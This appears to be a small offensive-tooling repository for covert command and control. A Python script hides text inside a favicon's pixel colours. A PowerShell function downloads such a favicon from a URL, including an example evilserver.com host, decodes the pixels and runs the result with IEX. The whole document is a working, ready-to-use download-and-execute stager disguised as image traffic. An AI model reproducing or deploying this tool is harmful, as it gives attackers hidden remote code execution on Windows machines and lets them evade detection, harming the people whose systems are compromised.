├── README.md
├── create_favicon.py
└── readFavicon.ps1


/README.md:
--------------------------------------------------------------------------------
1 | C2 via python generated favicon, read with powershell.
2 | 


--------------------------------------------------------------------------------
/create_favicon.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import sys, os, Image
 3 | 
 4 | def usage():
 5 | 	print "[!] Usage: %s <textfile> <outimage>.png"%sys.argv[0]
 6 | 	exit(-1)
 7 | 
 8 | if (len(sys.argv) == 3):
 9 | 	try:
10 | 		string = open(sys.argv[1]).read()
11 | 	except:
12 | 		print "[!] Error reading file!"
13 | 		exit(-1)
14 | else:
15 | 	usage()
16 | 
17 | if (len(string) > 3072):
18 | 	print "[*] Error: file too large for favicon"
19 | 	exit(-1)
20 | 
21 | chrVals = []
22 | for x in string:
23 | 	chrVals.append(ord(x))
24 | 
25 | img    = Image.new("RGB",(32,32),"black")
26 | pixels = img.load()
27 | 
28 | locIndex = 0    # used to track which pixel we are on
29 | 
30 | for z in range(0,len(chrVals),3):
31 | 	try:
32 | 		pixels[locIndex%32,locIndex/32] = (chrVals[z],chrVals[z+1],chrVals[z+2])
33 | 		locIndex += 1
34 | 	except:
35 | 		pass
36 | 
37 | img.save(sys.argv[2])
38 | 


--------------------------------------------------------------------------------
/readFavicon.ps1:
--------------------------------------------------------------------------------
 1 | function Get-FaviconText
 2 | {
 3 |     <#
 4 |     .SYNOPSIS
 5 |     Translate a favicon into executable code for c2 purposes
 6 |     C2 Get-FaviconText
 7 |     Author: Michael Scott (@_et0x)
 8 |      
 9 |     .DESCRIPTION
10 |     After creating a favicon using the python sister code in this repository, you serve it up as a 
11 |     vector for c2, to be read by this powershell script in a windows environment.  All the code in 
12 |     the icon is pushed into an IEX() statement for execution.
13 |      
14 |     .PARAMETER URL
15 |     The URL pointing to the favicon you wish to download.
16 |     
17 |     .PARAMETER WriteTo
18 |     The location on your disk you wish to put the favicon after downloading.  This is a requirement
19 |     for loading the favicon / reading the pixels / translating the colors into code.
20 |     todo:  Add parameters for default locations favicons are saved on a per-browser basis.1
21 | 
22 |     .EXAMPLE
23 |     C:\PS> Get-FaviconText -URL http://evilserver.com/favicon.ico -WriteTo $env:TEMP
24 |     Description
25 |     -----------
26 |     Download a favicon from evilserver.com, write it to your temp directory, and execute the code within.
27 |     
28 |     .EXAMPLE
29 |     C:\PS> Get-FaviconText http://evilserver.com/favicon.ico $env:TEMP
30 |     Description
31 |     -----------
32 |     Download a favicon from evilserver.com, write it to your temp directory, and execute the code within. (using positional args)
33 |     
34 |     .NOTES
35 |     Favicons must be encoded using the python sister code in the parent C2 repository.
36 |    
37 |     .LINK
38 |     http://www.rwnin.net
39 |     #>
40 | 
41 |     Param(
42 |         [Parameter( Position=0, Mandatory=$true )]
43 |         [string]$URL,
44 |         
45 |         [Parameter( Position=1, Mandatory=$true )]
46 |         [string]$WriteTo
47 |         
48 |         )
49 |         
50 |     $data = (new-object net.webclient).downloaddata($URL)
51 |     
52 |     [system.io.file]::writeallbytes("$WriteTo\favicon.ico",$data)
53 |     
54 |     $dll = [string]::format("$env:SystemRoot\Microsoft.NET\Framework\v{0}.{1}.{2}\System.Drawing.dll",$psversiontable.clrversion.major,$psversiontable.clrversion.minor,$psversiontable.clrversion.build)
55 |     
56 |     add-type -path $dll
57 |     
58 |     $img = [system.drawing.image]::fromfile("$($WriteTo)\favicon.ico")
59 |     
60 |     $final = ""
61 |     
62 |     $locIndex = 0
63 | 
64 |     while (1) {
65 |         
66 |         try{
67 |             
68 |             if (($img.getpixel($locIndex%32,[math]::floor($locIndex/32)).r) -ne 0) {
69 |                 $final += [convert]::tochar($img.getpixel($locIndex%32,[math]::floor($locIndex/32)).r)
70 |             } else { break }
71 | 
72 |             if (($img.getpixel($locIndex%32,[math]::floor($locIndex/32)).g) -ne 0) {
73 |                 $final += [convert]::tochar($img.getpixel($locIndex%32,[math]::floor($locIndex/32)).g)
74 |             } else { break }
75 | 
76 |             if (($img.getpixel($locIndex%32,[math]::floor($locIndex/32)).b) -ne 0) {
77 |                 $final += [convert]::tochar($img.getpixel($locIndex%32,[math]::floor($locIndex/32)).b)
78 |             } else { break }
79 | 
80 |                 $locIndex += 1
81 |                 
82 |         }catch{break}
83 |         
84 |     }
85 |     
86 |     $img.dispose()
87 |     
88 |     IEX($final -join '')
89 |     
90 | }
91 | 


--------------------------------------------------------------------------------